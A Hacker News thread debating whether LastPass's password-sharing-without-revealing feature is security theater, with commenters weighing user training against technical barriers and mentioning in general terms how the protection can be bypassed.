Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

> There's a feature where you can even share the login to a site on it, but they can't view the password - only lastpass can fill it up.

Prime example of Lastpass security theater - what exact problem did they think this feature solved?



People easily copying and pasting the password into a chat app to quickly share it with Greg from finance asking if he could just quickly log into the app even though he's not really supposed to?

Sure, its not too hard to get around that feature, you could just inject your own javascript on the page to dump the contents of the password field. But it does block the low hanging fruit of the millions of users who don't know how to do that who might abuse having access to the password because they don't really know better.

In essence, it helps to prevent those users who don't know better from leaking the password to places it shouldn't be. Obviously it doesn't prevent people who know how to get around it from getting around that protection, but in those circumstances you shouldn't really be sharing your password with someone who will abuse your trust.


The people likely to do such things counter to security are going to click phishing links, install malware and misuse their company devices anyway. Their problem is not technological in nature to solve - it is personal and behavioral. I call it theater because it doesn't significantly improve the security posture and maturity, while making both the user and administrator feel tough and hardened.


> The people likely to do such things counter to security are going to click phishing links, install malware and misuse their company devices anyway.

Are you arguing that because they might make mistakes elsewhere we shouldn't bother putting any barriers up to them breaking policy, and that the only thing we should do is more training? I'd argue both things should be done. I do agree preventing LastPass from directly exposing the password isn't a very strong protection, but lets not act like it doesn't prevent any kind of password abuse. Sure, users should be more trained, but we should also create more barriers to prevent them from shooting off their toes.

It almost sounds like an argument to get rid of barriers on highways. Drivers should just know to not drive off the cliff; if people are driving off the highway clearly all we need to do is train them more. Barriers are just safety theater, people might still end up driving off the cliff if they try hard enough!

You asked for a use case for this feature and I gave you a use case that happens all the time and which such a feature prevents a large percentage of those users. You'd need someone determined to break the policy to dump the password and share it someplace they shouldn't, as opposed to someone doing it without thinking "is this against policy? shrug"


Not having to rotate shared passwords after an employee leaves I suppose?


I think parent is referring to the idea that it's not a problem for a technically inclined person to when the extensions is filling out the password inspect the password HTML element and "see" it. Other options would include sniffing network traffic in your browser or replacing DNS with self hosted website with a form under the same domain to trick the extension to fill in a form on a website you control (since they match based on the typed in domain).




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: